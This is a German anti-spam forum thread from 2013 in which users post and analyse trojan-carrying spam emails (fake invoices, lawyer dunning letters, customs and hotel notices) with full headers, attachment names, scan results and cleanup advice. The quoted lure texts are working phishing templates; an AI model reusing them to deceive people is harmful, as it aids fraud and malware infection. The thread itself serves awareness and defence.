Was man am besten machen sollte, weiß ich auch nicht sicher - ich persönlich würde den Rechner vom Netz trennen und auf gar keinen Fall irgendwelche Dinge damit machen, bei denen Benutzernamen, Kontonummern, Kennwörter usw. eingegeben werden. Dann erst mal abwarten, was es zu diesen Viren an Neuigkeiten gibt, und dann mit aktualisiertem Virenscanner den Rechner nochmal durchsuchen.
Wie man das bei einem Windows-Rechner am besten macht, ohne ihn ans Netz anzuschließen, weiß ich aber nicht...

hoppala

Maßnahme 1: Den betroffenen Rechner vom Netz nehmen (Firmennetz sowie Internet). Achtung, auch WLAN abklemmen!

Ich empfehle auf jeden Fall, den Virenscanner auf die neueste Version zu bringen und einen umfangreichen Scan durchzuführen. Allerdings kann es dann trotzdem sein, dass der Schädling nicht erkannt wird. Wenn man auf Nummer sicher gehen will sollte man den betreffenden PC komplett formatieren und neu aufsetzen.

Es gibt auch kostenlose Online-Virenscanner, mit denen man die .exe-Datei analysieren kann. Weiß man um welchen Schädling es sich handelt kann man im Netz nach Gegenmaßnahmen suchen.

Was Trojaner üblicherweise so machen (Aufzählung nicht vollständig): Passwörter und Daten ausspähen, Spam und Viren weiter versenden, Daten unbrauchbar machen, Online-Banking manipulieren,... Der Phantasie sind eigentlich keine Grenzen gesetzt. Wer ein verseuchtes System im Netz lässt schadet nicht nur sich sondern auch anderen.

Hier die versprochene Analyse, ums kurz zusammenzufassen:
Backdoor.bublik, läd unteranderem trojan.zbot nach, erkennung von nur signatur basierter Scansoftware ist schlecht, dropper 7/46 gedropptes 4/46
http://www.trojaner-board.de/131800-first-class-zollservice-spam-luftfrachsendung-awb.html

Komisch bei mir nix zu finden

SHA256: 46711c7d8d199b62a19a290d130d9adac55f41f06992af2fb43c22b1aa496f45



Dateiname: AWB-Avis 080-86638149.pdf.zip

Erkennungsrate: 0 / 46
Analyse-Datum: 2013-03-04 xx:xx:xx UTC ( vor 1 Minute )

Hallo zusammen,

Wir haben alle Möglichen Maßnahmen getroffen.

Vorerst wurde der Rechner wieder auf ein Backup von gestern zurückgesetzt.

Allerdings hat kein Virenscanner angeschlagen. Ob der Trojaner installiert worden war oder nicht sei da hingestellt.

Nachgeladen hat dieser Trojaner wenn er installiert war auch nichts, dies kann man gut anhand der Firewall erkennen ob Verbindungen von diesem Rechner ausgingen.

Naja hoffen wir mal das diese Ganoven nicht zuviel Glück haben.

Gruß

Firma Neumann

in wie fern, habt ihr ne Hardware Firewall, denn desktop firewalls die auf dem Selben pc instaliert sind, taugen nichts. es gibt genug wege, um diese zu umgehen.
die Malware setzt zumindest in der win fw ausnamen.

Außerdem würde ich nicht nur ein Backup vom Vortag einspielen sondern tatsächlich die Platte formatieren.Wenn ohnehin ein "tagesfrisches" Backup vorhanden ist hält sich der Aufwand dafür in Grenzen.

Hallo zusammen,

ja es handelt sich hier um eine Hardwarefirewall.

Ohne diese ist der Schutz im Internet nich gewähleistet.

Es ist schon Wahnsinn was die ganze Welt einem zuschickt ohne das man davon etwas mitbekommt.
China, USA, Russland, Iran lassen Grüßen

Nur was da genau passiert, dass weiß keiner.

Nur bei diesen E-mail Geschichten bringt die Beste Abwehr nichts.

Danke und Gruß

Firma Neumann

naja, du kannst ja schon mal dateinamenerweiterungen anzeigen lassen, dann siehst du ja das .pdf.exe und dass allein sollte schon stutzig machen

Dass Windows standardmäßig Dateierweiterungen ausblendet ist allerdings für eine Vielzahl von Sicherheitsvorfällen verantwortlich. Zudem man bei Ausführbaren Dateien ein beliebiges Icon anzeigen lassen kann, das z.B. dem Symbol für PDF-Dateien ähnlich sieht. Ich verstehe beim besten Willen nicht, warum das immer noch die Standardeinstellung ist.

Aber davon abgesehen sollte man in seiner Firma für die nötige "Awareness" sorgen: Man öffnet einfach keine Mailanhänge von unbekannten Absendern. Selbst wenn tatsächlich eine PDF-Datei angehängt ist kann diese Schadcode enthalten.

du hast natürlich recht, in allem was du sagst :-) aber ich denke das Anzeigen der Dateiendungen ist noch mal ein zusätzliches Warnzeichen.
Ich glaube, den Idialfall erreichen wir nie, dass alle leute genügend sensibilisiert sind, dass solche Spams ins leere laufen

Hallo,

nur um klarzustellen. Es gibt einen Motorpark ähnlichen Namens am Hockenheimring. Der aber mit dem o.a. nicht identisch ist. Wenn man "gurgelt" gibt es auch einen J*** W*** dessen Identität sich die Spammer offensichtlich zu Nutze gemacht haben.

Heute habe ich eine Mahnung bekommen, auf meine E-Mail-Adresse bei GMX, die ich für Anmeldungen in vertrauenswürdigen Foren oder Webportalen nutze, bekommen. Für "Experimente" nutze ich Wegwerfadressen. Angehängt war eine suspekte ZIP-Datei, die ich natürlich nicht öffne. Thunderbird hat es zuverlässig als Spam verdächtigt. Braver Vogel:goodjob:

Return-Path: mohamedalikilani [at] yahoo.fr
Received: from nm21.bullet.mail.ird.yahoo.com ([212.82.108.136]) by
mx-ha.gmx.net (mxgmx102) with ESMTP (Nemesis) ID: [ID filtered]
<***>; Tue, 05 Mar 2013 xx:xx:xx +0100
Received: from [212.82.105.224] by nm21.bullet.mail.ird.yahoo.com with NNFMP; 05 Mar 2013 xx:xx:xx -0000
Received: from [217.146.188.172] by tm20.bullet.mail.ird.yahoo.com with NNFMP; 05 Mar 2013 xx:xx:xx -0000
Received: from [127.0.0.1] by smtp140.mail.ird.yahoo.com with NNFMP; 05 Mar 2013 xx:xx:xx -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.fr; s=s1024; t=1362477738; bh=iz7+YKXZJLFd8QU6YuTq+xqLklcoKhgdSPUXeBmtv6g=; h=X-Yahoo-Newman-Id:Message-ID:X-Yahoo-Newman-Property:X-YMail-OSG:X-Yahoo-SMTP:Received:From:To:Subject:Date:MIME-Version:X-Mailer:X-Priority:Content-Type; b=kt+mEeAMjuaUcdC/wCnFm0gxBkK0CQTyqx8WqA+vlatM67RGos4a28F64Tk2ze3Z1iIaa1qPxNZB1QRtHwzBE5SYOb54waHU jDehkPSckhLqsmGO5oaa3PIsNTt3Jo0oZEOaFtbFAOlHSEg2pZzFR1Up/CGdcCB3hQz055WvBzQ=
X-Yahoo-Newman-ID: [ID filtered]
Message-ID: [ID filtered]
X-Yahoo-Newman-Property: ymail-3
X-YMail-OSG: zUshyegVM1mKyoEGbzPbtQ6Pah.lZH.dx3EjbqJILfJk8Q3
yumAtt0jV6ICv1Eqndj9GBiBaSdXW7wMptwnjwCXKJ6L30CC0T2vpDQtaNoz
hleiRO3kp9Gx6FSibR2T9qFppYpE7SBfv_zsJYNqVlKs.o6T3Zs9gYGwa90K
vN9Z3a20e77CmGHAXwuuIqEqmpp0uI3oc5f9TQeUR7OrW2DaGoGKgdE4BAt7
3DbfjzhGheHhL83Kom5mdBa9dvnzc1nFcbAnHS4fep7.pAlB9ueqQPWEYQ52
oQ2jw571exUf4CO1f7KZBfC1zmwNJzhekFxVPftIknNcZ6p5voKgn3KG.1H3
WoGL314_lbKvzL9AtMDwgSBgyZ7B65FMYHef7rWuTLQ9YMPEZMLGwA31488U
SzPqqryv48peLRg3XtQyr
X-Yahoo-SMTP: TWIMTzSswBDCWIxthsD9JAz8Tlf1MAwAFurpfs4-
Received: from Laptop (mohamedalikilani [at] 88.208.147.5 with login)
by smtp140.mail.ird.yahoo.com with SMTP; 05 Mar 2013 xx:xx:xx -0800 PST
From: <mohamedalikilani [at] yahoo.fr>
To: "Vorname Isenächer" <Ich poor [at] spamvictim.tld>
Date: Tue, 5 Mar 2013 xx:xx:xx GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC1FC015DA"
Envelope-To: <Ich poor [at] spamvictim.tld>
Subject:*** GMX Spamverdacht *** Vorname Isenächer Ihre Rechnung vom 05.03.2013

Hier noch der Text

Bestelldatum: 23.01.2013 empfangen von Vorname Isenächer
Rechnungsbetrag: 366,08 Euro
Produkt-Nummer: 9199738705
Geb=C3=BChren Ihrer Mahnung: 8,00 Euro

Sehr geehrter Kunde Vorname Isenächer,

in der Hektik des Lebens haben Sie sicher nur vergessen, unsere Rechnung zu=
begleichen. Ungl=C3=BCcklicherweise konnte unsere Buchhaltung bez=C3=BCgli=
ch der angeh=C3=A4ngten Rechnung noch keinen Eingang ersehen.=20

Wir bitte Sie diesen Betrag unter Angaben der oben genannten Bestellnummer =
bis zum 09.03.2013 auf das im Kaufvertrag angegebene Konto umgehen zu =C3=BC=
berweisen. Sofern Sie den genannten Termin nicht einhalten, werden wir Ihne=
n weitere Verzugszinsen und Mahnkosten berechnen.

Eine weitere Mahnung erfolgt nicht.=20

Sollten Sie die Zahlung nicht fristgem=C3=A4=C3=9F vornehmen, wird die Ford=
erung an ein Inkassounternehmen =C3=BCberreicht, was mit weiteren Kosten zu=
Ihren Lasten verbunden sein wird.=20

Mit bestem Dank f=C3=BCr Ihr Vertrauen in=20
Motorpark Schremps J*** W***

Huch, hab ich jetzt Angst vor dem Inkassounternehmen:scared:

Was mich allerdings wundert: Dort, wo "Vorname Isenächer" steht, war mein Klarname. Und den können eigentlich nur die Portale und Foren bzw. Adressaten, die ich kenne, sehen. Gibt es Erfahrungen, ob vermeintlich zuverlässige Portale wie GMX o.ä. undicht sind ? Oder lässt sich das irgendwie auslesen ?

Gruß

Isenächer

In Zusammenhang mit gmx liest man in letzter Zeit immer wieder von Spam, der per nur gmx bekanntem Namen personalisiert ist.


Siehe auch:

https://www.antispam-ev.de/forum/showthread.php?34585-Datenleck-bei-GMX

Hier wird eine (wortwörtlich) "Luftfrachsendung" angekündigt:

Return-Path: <monolithicp38 [at] first-class-zollservice.de>
Received: from mailin50.aul.t-online.de ([172.20.26.255])
by ehead408.aul.t-online.de (Dovecot) with LMTP ID: [ID filtered]
Thu, 07 Mar 2013 xx:xx:xx +0100
Received: from c2337c29.fsp.oleane.fr ([194.51.124.41]) by mailin50.aul.t-online.de
with esmtp ID: [ID filtered]
Received: from [199.104.98.123] (account monolithicp38 [at] first-class-zollservice.de HELO qxjxkrkdvzka.zwwpgtirbgtdbd.net)
by c2337c29.fsp.oleane.fr (CommuniGate Pro SMTP 5.2.3)
with ESMTPA ID: [ID filtered]
From: "Information" <info [at] first-class-zollservice.de>
To: <poor [at] spamvictim.tld>
Subject: Luftfrachsendung AWB
Date: Thu, 7 Mar 2013 xx:xx:xx +0100
MIME-Version: 1.0
X-Priority: 3
X-Mailer: xykll-15
Message-ID: [ID filtered]
Content-Type: multipart/mixed;
boundary="----=a__vuug_31_37_13"
X-TOI-SPAM: n;1;2013-03-07Txx:xx:xxZ
X-TOI-VIRUSSCAN: clean
X-TOI-EXPURGATEID: [ID filtered]
X-TOI-SPAMCLASS: DANGEROUS, ATTACHMENT
X-TOI-MSGID: [ID filtered]
X-Seen: false
X-ENVELOPE-TO: <poor [at] spamvictim.tld>




v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);} Hallo, anbei der AWB bitte bestätigen ob alles Ok ist. Danke Mit freundlichen Grüßen First Class Zollservice & Transportvermittlungs GmbH Niederlassungsleiter Nordendstraße. 32 B 64546 Mörfelden Walldorf www.first-class-zollservice.de Schulungen im Bereich Luftsicherheit - ONLINE 3+1 Std. Schulung gemäß 185/2010 Kap. 11.2.3.9 / Schulungen im Bereich Zoll- und Außenwirtschaft Wir arbeiten ausschließlich auf Grundlage der Allgemeinen Deutschen Spediteurbedingungen (ADSp), jeweils neueste Fassung. Diese beschränken in Ziffer 23 ADSp die gesetzliche Haftung für Güterschäden nach § 431 HGB für Schäden im speditionellen Gewahrsam auf EUR 5,- je Kg. Bei multimodalen Transporten unter Einschluss einer Seebeförderung auf 2 Sonderziehungsrechte je Kg sowie darüber hinaus je Schadenfall bzw. - ereignis auf EUR 1,0 bzw. 2,0 Mio. oder 2 Sonderziehungsrechte /kg, je nach dem, welcher Betrag höher ist.

Natürlich mit angehängter zip.

Bekam heute den gleichen Zoll-Schrott. :mad:
Mit einer xxxpdf.zip-Datei. Hab es natürlich sofort gelöscht.
Ein Bekannter bekam auch schon einige "Mahnungen",
bei mir waren es "nur" 3.
Ich hoffe, es fallen nicht viele auf diese Masche rein
und öffnen die Datei.

das habe ich eben bekommen, nebst 114_TKG.zip-Anhang.
Betreff war 'Urheberrechtsverletzung als Teilnehmer'.
Sieht ja nach Spam aus, konnte aber rein gar nichts dazu im Netz finden. Irgendwie seltsam.



"Gegenstand unserer Beauftragung ist eine über Ihren Internetanschluss im Internet begangene Urheberrechtsverletzung als Teilnehmer eines so genannten Peer-to-Peer-Netzwerkes

Folgende Daten konnte unsere Mandantschaft - neben weiteren Einwahlen - aufgrund einer speziell entwickelten Software feststellen und beweissicher dokumentieren lassen

Im Rahmen eines staatsanwaltlichen Auskunftsverlangens gemäß § 113 TKG wurde mitgeteilt, dass der festgestellte Internetanschluss auf Ihren Namen angemeldet ist, so dass Sie für die Urheberrechtsverletzung, welche unter Nutzung des Anschlusses begangen wurde, zivilrechtlich haften. "

Willkommen im Forum.

Kurze Antwort: Ist Spam.

Das kann man beispielsweise hieran erkennen:

Absender (T-Mobile) der E-Mail passt nicht zum Absender laut Text ("Beauftragter" und ganz sicher nicht T-Mobile). Beides ist übrigens gleichermaßen frei fälschbar.
Kein vollständiges Impressum innerhalb der E-Mail.
Kontaktaufnahme findet überhaupt per E-Mail statt anstatt Brief/Einschreiben.
zip-Anhang deutet auf den eigentlichen Zweck hin: der eigene Rechner soll mit einer Schadsoftware angegriffen werden. Daher nicht öffnen!


Eine noch bessere Analyse ist möglich, wenn der sogenannte "Header" hier veröffentlicht wird. Darin befindet sich beispielsweise eine eindeutige Kennung des Netzwerkes, aus dem die E-Mail verschickt wurde. Das ist im Gegensatz zur Absender-E-Mail nicht fälschbar. Man kann dann prüfen, ob das Netzwerk für den angeblichen Versender plausibel ist. Oft stellt sich heraus, dass die E-Mail aus einem Netzwerk aus China, Korea oder sonstwo aus dem Ausland stammt. Da ist es schnell eindeutig, dass es sich um Spam handelt.

Im Antispam-Wiki (http://www.antispam-ev.de/wiki/Portal) gibt es viel Lesestoff.

das habe ich eben bekommen, nebst 114_TKG.zip-Anhang.
-> Phishing/Exploits, einer unserer Mail-Virenscanner meldet

999_TKG.zip: Suspect.DoubleExtension-zippwd-15

wobei 999 eine beliebige dreistellige Zahl ist.

Danke !!!

der Header zur Spam-mail wegen angebl. Urheberrechtsverletzung

Hier auflageschlagen 11 Mar 2013 xx:xx:xx

Received: (qmail 20499 invoked from network); 11 Mar 2013 xx:xx:xx -0000
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
spamkill08do.versatel-west.de
X-Spam-Status: No, score=4.1
Received: from host93-0-static.107-82-b.business.telecomitalia.it ([82.107.0.93])
(envelope-sender <poor [at] spamvictim.tld>)
by mail02do.versatel.de (qmail-ldap-1.03) with SMTP
for <poor [at] spamvictim.tld>; 11 Mar 2013 xx:xx:xx -0000
Received: from [34.141.146.133] (account spread8 [at] t-mobile.de HELO cwbvccnuzmjf.bjokgjxmskr.va)
by host93-0-static.107-82-b.business.telecomitalia.it (CommuniGate Pro SMTP 5.2.3)
with ESMTPA ID: [ID filtered]
From: <noreply [at] t-mobile.de>
To: <poor [at] spamvictim.tld>
Subject: Urheberrechtsverletzung als Teilnehmer
Date: Mon, 11 Mar 2013 xx:xx:xx +0100
MIME-Version: 1.0
X-Priority: 3
X-Mailer: dhjt 26
Message-ID: [ID filtered]
Content-Type: multipart/mixed;
boundary="----=a__xvizeuojmf_62_42_62"
X-VT-Original-To: Meine [at] adresse.de
------=a__xvizeuojmf_62_42_62
Content-Type: multipart/alternative;
boundary="----=_xvizeuojmf_62_42_62"

------=_xvizeuojmf_62_42_62
Content-Type: text/plain;
charset="windows-1250"
Content-Transfer-Encoding: quoted-printable

hab ich auch bekommen :-)

Received: from [185.11.233.215] (unknown [185.11.233.215])
byxxx.xxx.xxx (Postfix) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Mon, 11 Mar 2013 xx:xx:xx +0100 (CET)
Received: from [42.110.18.94] (account antietamjpy82 [at] t-mobile.de HELO tczgiznoz.prkbul.net)
by (CommuniGate Pro SMTP 5.2.3)
with ESMTPA ID: [ID filtered]
From: <noreply [at] t-mobile.de>
To: <poor [at] spamvictim.tld>
Subject: *** VIRUS ***Urheberrechtsverletzung als Teilnehmer
Date: Mon, 11 Mar 2013 xx:xx:xx +0100
MIME-Version: 1.0
X-Priority: 3
X-Mailer: rrroywt 25
Message-ID: [ID filtered]
Content-Type: multipart/mixed;
boundary="----=a__vnkaurmogp_62_51_70"
X-Antivirus-Status: Infected
X-Attachment: 815_TKG.zip#357800017|>113_TKG.PDF.exe Virus: Win32:Filename-A [Susp] Deleted

Heute schlug eine Bestätigung bei mir auf, die vermeintlich von hotel.de kommt:

Return-Path: <slobfu92 [at] hotel.de>
Delivery-Date: Mon, 18 Mar 2013 xx:xx:xx +0100
Received-SPF: fail (mxeu1: domain of hotel.de does not designate 213.161.158.74 as permitted sender) client-ip=213.161.158.74; envelope-from=slobfu92 [at] hotel.de; helo=85.96.44.64.dynamic.ttnet.com.tr;
Received: from 85.96.44.64.dynamic.ttnet.com.tr ([213.161.158.74])
by mx.kundenserver.de (node=mxeu1) with ESMTP (Nemesis)
ID: [ID filtered]
Return-Path: <Reserv [at] hotel.de>
Received: from unknown (HELO prodmail.hotel.de) (216.82.255.50)
by mail1.bemta7.messagelabs.com with SMTP; Mon, 18 Mar 2013 xx:xx:xx +0200
Received: from ([127.0.0.1]) with MailEnable ESMTP; Mon, 18 Mar 2013 xx:xx:xx +0200
MIME-Version: 1.0
From: "hotel.de" <Reserv [at] hotel.de>
Date: Mon, 18 Mar 2013 xx:xx:xx +0200
Subject: Hotel.de Reservierung [42938447], Mon, 18 Mar 2013 xx:xx:xx +0200
Wie man am SPF-Fail sieht, ist die Mail über einen Dialin-Account in der Türkei abgekippt worden. Entweder Botnetz oder ein türkisches Spamnetzwerk.




Reservierung


Buchungsnummer: 6O9679512
Buchungsdatum: Mon, 18 Mar 2013 xx:xx:xx +0200
Mehr Details in der beigefugten Datei

Anreise: 23.03.2013 Anzahl Nächte: 1
Abreise: 24.03.2013 Gesamtanzahl Personen: 1
Preis: 17,42 EUR
Der Gesamtpreis beinhaltet 5,11 EUR Steuern und Abgaben.

Hinweis: Diese Buchung ist per Bankkarte gesichert.
--------------------------------------------------------------------------------
Mit freundlichen grüßen
Ihr hotel.de/hotel.info-Team
hotel.de AG - www.hotel.de - www.hotel.info
Im Anhang findet sich eine "HotelReservierung1608784.pdf.zip", die laut Virus Total erwartungsgemäß ziemlich verseucht ist (https://www.virustotal.com/de/file/ec3d76d39cac9a53f63a559861e0bb182e7346e775535313d2a262738743da5f/analysis/). Also: Finger weg!

Amazon wird auch schon fleißig Missbraucht dort ist es der Medionshop

From: - Fri Mar 22 xx:xx:xx 2013
X-Account-Key: account12
X-UIDL: [UID filtered]
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
X-Envelope-From: <service [at] baur.de>
X-Envelope-To: <poor [at] spamvictim.tld>
X-Delivery-Time: 1363958704
X-UID: [UID filtered]
Return-Path: <service [at] baur.de>
X-RZG-MI-VALUES: bm=0 mafl=1 sh=0 du=0 sp=2,1 vv=1 nf=0
X-Strato-MessageType: email
X-RZG-CLASS-ID: [ID filtered]
Received: from 01-ah-r29u13-ss44.alphahosting.com (web.server.MX.relay.75.127.110.44-static.reverse.yourdnshost.com [75.127.110.44]) by mailin.rzone.de (jored mi88) (RZmta 31.22 OK) with SMTP ID: [ID filtered]
Received: from qmuamjl (179.121.178.138) by 01-ah-r29u13-ss44.alphahosting.com; Fri, 22 Mar 2013 xx:xx:xx -0400
Message-ID: [ID filtered]
Reply-To: <fashion-beratung [at] baur.de>
From: <service [at] baur.de>
To: <poor [at] spamvictim.tld>
Subject: Möbel kaufen BAUR Versand
Date: Fri, 22 Mar 2013 xx:xx:xx -0400
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_009E_01C4594B.408C0E08"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165


п»їSehr geehrte Kundin! Sehr geehrter Kunde!



Vielen Dank fГјr Ihren Einkauf bei Baur Versand. NГ¤hereВ InformationenВ zuВ IhrerВ BestellungВ findenВ SieВ imВ Anhang.В



Mit freundlichen GrГјГџen

Baur Versand



-----------------------------

Baur Versand (GmbH & Co KG)

Bestellservice

96222 Burgkunstadt

Im Anhang: "Bestellung.zip"

Über amerikanischen Server 75.127.110.44

Jetzt als 'Esprit', man beachte die verkorksten Umlaute, scheint dieselbe Bande zu sein:

Received: from server.azhostinq.info (pro1524.startdedicated.com
[188.138.92.56])
by mx.kundenserver.de (node=mxeu3) with ESMTP (Nemesis)
ID: [ID filtered]
xx:xx:xx +0200
Received: from fozpz (95.168.91.95)
by server.azhostinq.info; Thu, 4 Apr 2013 xx:xx:xx +0500

IP: 188.138.92.56 ---> Plusserver, DE


п»їп»їSehr geehrte Kundin! Sehr geehrter Kunde!

vielen Dank fГјr Ihre Bestellung im Esprit Online Shop. Ihr Auftrag
bleibt 3 Tage fГјr Sie reserviert!


Sie können das Dokument als Zip-Datei ohne Bedenken öffnen und wenn
Sie möchten jederzeit ausdrucken.

Herzliche GrГјГџe,
Ihr Esprit Team
__________________________________________________________________________
Esprit Retail B.V. & Co. KG
Esprit Allee
40882 Ratingen
Deutschland

im Anhang dann: Bestellbestдtigung_032013.zip

der natürlich noch wenig erkannt wird:

http://virusscan.jotti.org/de/scanresult/3fa3e7288d50133debac4504309ba1a64e6024c6/af5a6935a1aefd3e60b30caacbb5ecff1fb140e1

Hier kommt eine angebliche Rechung von Otto-versand

Return-Path: <xxxxxx>
Received: from mail.punktnet.net ([87.193.188.203]) by mailin53.aul.t-online.de
with esmtp ID: [ID filtered]
Received: from User (UnknownHost [195.243.135.194]) by mail.punktnet.net with SMTP;
Sat, 6 Apr 2013 xx:xx:xx +0200
Reply-To: <otto.de [at] e-mail.ua>
From: "xxxxxxx>
Subject: Gezahlt Rechnungseingang/PaID: [ID filtered]
Date: Sat, 6 Apr 2013 xx:xx:xx +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_007E_01C2A9A6.615FAB18"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-TOI-SPAM: u;0;2013-04-06Txx:xx:xxZ
X-TOI-VIRUSSCAN: unchecked
X-TOI-MSGID: [ID filtered]
X-Seen: false
X-ENVELOPE-TO: <xxxxxxx>


Sehr geehrter Kunde,

Wir haben Ihre Zahlung erhalten, und es wurde von uns bestдtigt wurde, bitten wir Sie downloaden und цffnen Sie die Gezahlt Rechnungseingang mit dieser Nachricht angehдngt.

Ihre Bestellung wird auf dem Weg zu Ihnen Haustьr bald.

Danke,

Kundendienst.

geblockt wird eine : paID: [ID filtered]

....und wieder eine Mahnung mit "zip-Anhang":

Absender:
From: clarc5 [at] web.de
Received: from mout-xforward.web.de ([82.165.159.3]) by mx-ha.web.de (mxweb106) with ESMTP (Nemesis) ID: [ID filtered]


Sehr geehrte/r....

leider haben Sie auf unsere Forderung bis jetzt weder durch Zahlung noch durch eine Erklärung für das Ausbleiben dieser, reagiert.

Dies ist ein gesetzlicher Vertragsbruch Ihrerseits. Nach geltendem Recht könnten wir die offene Forderung bereits jetzt bei Gericht erzwingen. Wir schenken Ihnen trotzdem noch eine letzte Möglichkeit, Ihre vertragliche Verpflichtung zu erfüllen, indem Sie unverzüglich die ausstehende Summe in Höhe von 788,00 Euro an uns zur Zahlung bringen. Die Kontodaten sind in der beigefügten Rechnung.

Kundenservice [at] bonprix.de
Fon 0180 4845 / 59
www.bonprix.de

Geschäftsführer D*** L***
Ust-IdNr. DE 1066375881

Leider ist es mir noch nicht gelungen, den Header so schön zu analysieren.
LG

Moin,

der Name der Firma Elektroshop Wagner in 35423 Lich wird von den Rechnungs-Verteilern (Trojaner im ZIP-Anhang zur E-Mail) offensichtlich ganz massiv mißbraucht, siehe Impressum der Firma Wagner:



Wichtiger Hinweis: Spam-Mails im Namen von Elektroshop Wagner

Sie haben eine E-Mail im Namen von Elektroshop Wagner bekommen und die dort erwähnte Bestellung nicht getätigt? Wir können Sie beruhigen: Diese E-Mail stammt nicht von uns und Sie bekommen weder eine unerwünschte Lieferung, noch müssen Sie fälschlicherweise eine Rechnung begleichen. Bei diesen E-Mails handelt es sich um Spam E-Mails, die unseren guten Namen missbrauchen.
Quelle: http://www.elektroshopwagner.de/

return-Path: <daniel1971 [at] online.de>
Received: from mailin52.aul.t-online.de ([172.20.27.1])
by ehead410.aul.t-online.de (Dovecot) with LMTP ID: [ID filtered]
Tue, 11 Jun 2013 xx:xx:xx +0200
Received: from moutng.kundenserver.de ([212.227.126.171]) by mailin52.aul.t-online.de
with esmtp ID: [ID filtered]
Received: from Edmund-PC (ppp-82-135-93-195.dynamic.mnet-online.de [82.135.93.195])
by mrelayeu.kundenserver.de (node=mrbap2) with ESMTP (Nemesis)
ID: [ID filtered]
From: "Marvin Hartmann Anwaltschaft" <daniel1971 [at] online.de>
To: "meine Adresse"
Subject: Mein Name Ihre Rechnung von Rechtsanwalt Mandantschaft
Date: Tue, 11 Jun 2013 xx:xx:xx GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC255C3C62"
Message-ID: [ID filtered]
X-Provags-ID: [ID filtered]
k/B8zOIqzeRVhwvuL4dGYRzj0VoV4wi09PLUivF7Jr6pnRfE/5
irpJ2yRsKYrtP3R2BWtdKsLAGGK9NYK2Q3+jb9GNdWsqd4Sk6n
aInxqk4i1y88Ck7q0ZnI+Eiu7Ta6muiE0kn/E2Bb844YEz414D
vp4N6duPICgoaTJRVjDKBLsNHQwOllBmEaSm1+guYRn83x+qEQ
dlaJxhx5yagjerNyX5aWlHruWdbT7INS7H3QKbBUlJ+DtQO37N
6ImVmhamlteaJT9Iw1bFZxmMGvOon0gsb1sjZPm1rMwLtBj6Vi
gftMAzvP7N6Qznhn34T+w45NyjXZkL/cBrv6ZNoJJ
X-TOI-SPAM: n;1;2013-06-11Txx:xx:xxZ
X-TOI-VIRUSSCAN: clean
X-TOI-EXPURGATEID: [ID filtered]
X-TOI-SPAMCLASS: DANGEROUS, VIRUS
X-TOI-MSGID: [ID filtered]
X-Seen: false
X-ENVELOPE-TO: <meine Adresse>



Verehrte/r mein Name,

wir wurden von Comtech Shop GmbH beauftragt die finanziellen Interessen zu vertreten. Die ordnungsgemäße Bevollmächtigung wurde notariell schriftlich zugesichert.

Mit dem ausgeführtem Auftrag vom 22.05.2013 haben Sie sich gesetzlich verpflichtet die Summe von 728,00 Euro an unseren Mandanten zu begleichen. Dem sind Sie bis jetzt nicht nachgekommen. Weiterhin sind Sie aus Gründen des Verzuges verpflichtet die Ausgaben unserer Beauftragung zu tragen.

Diese ergeben sich gemäß folgender Abrechnung:

EUR 16,00 (nach Nr. 222 RGV}
EUR 18,00 (Vergütung gemäß § 4 Abs. 1 und 2 RVG}

Wir verpflichten Sie mit Kraft unserer Mandantschaft den Gesamtbetrag auf das Bankkonto unseren Mandanten zu überweisen. Die Kontodaten und die Einzelheiten der Bestellung finden Sie im angehängtem Ordner. Für den Eingang der Zahlung geben wir Ihnen eine letzte Zeitfrist bis zum 17.062013.

Das Einhalten dieser Pflicht liegt auch in Ihrem Interesse. Falls Sie diese Frist fruchtlos verstreichen, werden ohne weitere Aufforderung gerichtliche Schritte einleitet. Dadurch werden Ihnen weitere, erhebliche Kosten entstehen.

Mit freundliche Grüßen Marvin Hartmann Anwaltschaft



Dazu ein gezippter Anhang. Mit freundliche Grüßen... Die Zeitfrist werde ich einhalten und im Jahr 62013 den Betrag inklusive Zinsen zahlen.

Ich weiß, "Mahnungen" mit Zip im Anhang sind ein alter Hut. Diese hier hat mich aber doch etwas verwirrt, da ich mit vollem Namen angesprochen werde:

Return-Path: <uwe.link-privat [at] t-online.de>
Received: from [194.25.134.83] (helo=mailout07.t-online.de)
by *
(envelope-from <uwe.link-privat [at] t-online.de>)
for *; Tue, 11 Jun 2013 xx:xx:xx +0200
Received: from fwd08.aul.t-online.de (fwd08.aul.t-online.de )
by mailout07.t-online.de with smtp
ID: [ID filtered]
Received: from test-PC (ZSbMmqZr8hqR0j0nZyY-35asNjouqmVVywaxvb7+4G6JHrf-LrGLl8JAjsP0j2IZLf@[78.55.196.9]) by fwd08.t-online.de
with esmtp ID: [ID filtered]
From: "Finja Hofmann Inkasso Anwaltschaft" <uwe.link-privat [at] t-online.de>
To: *
Subject: [Mein Name] Ihre Aufforderung von Anwaltschaft Mandantschaft
Date: Tue, 11 Jun 2013 xx:xx:xx GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
Content-Type: multipart/mixed; boundary="=-XC02717EC8"
Message-ID: [ID filtered]


Sehr geehrte/r [Mein Name],

wir wurden von Buch Online GmbH beauftragt die gesetzlichen Interessen zu vertreten. Die Bevollmächtigung wurde notariell schriftlich zugesichert

Mit dem abgeschlossenem Vertrag vom 07.04.2013 haben Sie sich vertraglich verpflichtet den Betrag von 192,00 Euro an unseren Mandanten zu begleichen. Dieser Pflicht sind Sie bis heute nicht nachgekommen. Weiterhin sind Sie aus Gründen des Verzuges dazu verpflichtet die Ausgaben unserer Beauftragung zu tragen. [...]

